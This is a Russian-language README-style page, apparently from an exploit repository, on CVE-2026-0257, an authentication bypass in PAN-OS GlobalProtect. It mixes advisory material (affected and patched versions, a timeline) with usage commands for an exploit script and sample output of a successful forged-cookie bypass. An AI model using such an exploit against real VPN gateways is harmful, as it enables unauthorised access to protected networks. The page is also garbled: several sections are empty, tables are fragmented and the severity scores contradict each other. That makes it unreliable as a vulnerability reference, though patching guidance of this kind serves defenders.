
CVE-2026-0257
PAN-OS: Уязвимости обхода аутентификации GlobalProtect
Обход аутентификации в портале и шлюзе GlobalProtect
CVE-2026-0257 — это уязвимость обхода аутентификации, затрагивающая компоненты портала и шлюза GlobalProtect в программном обеспечении PAN-OS от Palo Alto Networks.
Неаутентифицированный удаленный злоумышленник может обойти ограничения безопасности и установить несанкционированное VPN-соединение с уязвимыми межсетевыми экранами.
Примечание: Panorama и Cloud NGFW не затронуты.
| Метрика |
|---|
Вектор (пример CVSS 4.0):
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N
Уязвимости обхода аутентификации в портале и шлюзе GlobalProtect в программном обеспечении PAN-OS® от Palo Alto Networks позволяют злоумышленнику обойти ограничения безопасности и установить несанкционированное VPN-соединение.
Проблема проистекает из CWE-565: Использование файлов cookie без проверки и контроля целостности.
Не затронуты:
Для эксплуатации этой уязвимости требуется следующая конфигурация:
Высокое влияние на конфиденциальность и целостность защищенных сетей.
python3 CVE-2026-0257.py --target vpn.company.com
python3 CVE-2026-0257.py --target 192.168.1.100 --user administrator --verbose
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0257 - GlobalProtect Auth Bypass ║
║ Public Key Cookie Forging Exploit ║
║ Author: 0xBlackash ║
╚══════════════════════════════════════════════════════════════╝
[*] Connecting to vpn.company.com:443 to extract certificate chain...
[+] Found 2048-bit RSA key
[*] Forging authentication cookie for user: admin
[1/1] Trying public key...
Cookie (first 60 chars): eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
[+] SUCCESS! Authentication Bypass Achieved!
Username : admin
Cookie : eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
Исправленные версии (примените срочно):
| Версия PAN-OS | Исправленная версия |
|---|---|
| 12.1 | ≥ 12.1.4-h6, ≥ 12.1.7 |
| 11.2 | ≥ 11.2.4-h17, ≥ 11.2.7-h14, и т.д. |
| 11.1 | ≥ 11.1.4-h33, ≥ 11.1.7-h6, и т.д. |
| 10.2 | ≥ 10.2.7-h34, ≥ 10.2.10-h36, и т.д. |
Prisma Access также имеет соответствующие исправленные версии.
Немедленные временные решения (если установка исправлений невозможна):
| Дата | Событие |
|---|---|
| 2026-05-13 | Опубликован CVE + первоначальное уведомление |
| 2026-05-17 | Эксплуатация замечена в дикой природе |
Рекомендация: Установите исправление немедленно — рассматривайте как критическую, несмотря на базовую оценку CVSS, из-за активной эксплуатации.
Сгенерировано в стиле README — 30 мая 2026 г.
| Оценка |
|---|
| Уровень |
|---|
| CVSS v4.0 | 7.8 / 4.7 | Высокий / Средний |
| CVSS v3.x | До 9.8 | Критический |
| Срочность | НАИВЫСШАЯ | - |
| 2026-05-29 | Обновление Palo Alto + добавление в CISA KEV |
| 2026-05-30 | Этот отчет |